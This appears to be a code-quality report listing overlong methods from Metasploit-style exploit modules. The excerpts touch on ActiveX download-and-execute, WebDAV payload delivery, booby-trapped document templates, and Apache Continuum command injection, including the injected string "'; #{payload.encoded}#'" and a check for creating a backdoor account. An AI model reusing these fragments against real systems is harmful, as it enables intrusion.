Showing 15,831 of 21,886 total issues
Method initialize
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name}")
Method generate_shares
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def generate_shares(path)
share_name = @share_name
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
Method process_get
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def process_get(cli, request)
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav = "\\\\#{myhost}\\"
if blacklisted_path?(request.uri)
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
template = [
"[Content_Types].xml",
"_rels/.rels",
"docProps/thumbnail.jpeg",
Method on_file_read
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
# Reads the entire contents of `file` in binary mode into `buf`.
# Only the first lines of the method appear in this listing; the rest is not shown.
def on_file_read(fname, file)
# NOTE(review): Kernel#open has historically treated a path that begins with "|" as a
# command to spawn. If `file` can ever come from outside the module, File.open(file, 'rb')
# avoids that; its block form (or File.binread) also closes the handle when read raises,
# which the explicit f.close below does not.
f = open(file, 'rb')
buf = f.read
f.close
Method make_ttf
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def make_ttf
ttf_data = ""
# load the static ttf file
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
template = %Q|<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
<title>Playlist</title>
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
peer = "#{rhost}:#{rport}"
# Setup the necessary files to do the wbemexec trick
Method generate_shares
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def generate_shares(path)
share_name = datastore['SHARENAME']
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
# Only the opening guard of the method appears in this listing; the rest is not shown.
def exploit
# Safety guard: when is_root? reports that the session already has root privileges,
# fail_with is called with Failure::BadConfig unless the operator has explicitly set
# the ForceExploit datastore option.
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
# Only the opening guard of the method appears in this listing; the rest is not shown.
def exploit
# Safety guard: when is_root? reports that the session already has root privileges,
# fail_with is called with Failure::BadConfig unless the operator has explicitly set
# the ForceExploit datastore option.
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
# Only the opening guard of the method appears in this listing; the rest is not shown.
def exploit
# Safety guard: when is_root? reports that the session already has root privileges,
# fail_with is called with Failure::BadConfig unless the operator has explicitly set
# the ForceExploit datastore option.
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
Method api_key
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def api_key
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
Method execute_command
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
# Only the first lines of the method appear in this listing; the rest is not shown.
def execute_command(cmd, _opts = {})
# The entire command has to be percent-encoded.
# A literal '+' cannot be used and percent-encoding does not help with it, so
# 'chmod +x' is rewritten to 'chmod 744' before the command is encoded.
cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))
# NOTE(review): 20.year.ago / 10.year.ago look like ActiveSupport duration helpers rather
# than core Ruby; confirm that ActiveSupport is loaded wherever this module runs.
start_time = rand(20.year.ago..10.year.ago) # a date far enough in the past to make sure all possible data is captured
Method check
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def check
# For this exploit to work, we need to check two services:
# * HTTP - To create the backdoor account for SSH
# * SSH - To execute our payload
Method add_device
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def add_device(cookies)
add_uri = normalize_uri(target_uri.path, 'addhost')
@hostname = Rex::Text.rand_text_alpha(6...12)
comm_payload = "'; #{payload.encoded}#'"
Method initialize
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Continuum Arbitrary Command Execution',
'Description' => %q{
This module exploits a command injection in Apache Continuum <= 1.4.2.
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
cookie = auth
csrf_token = get_csrf_token(cookie)
Method execute_command
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
def execute_command
case target.name
when 'ELASTIC'
request = {
'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),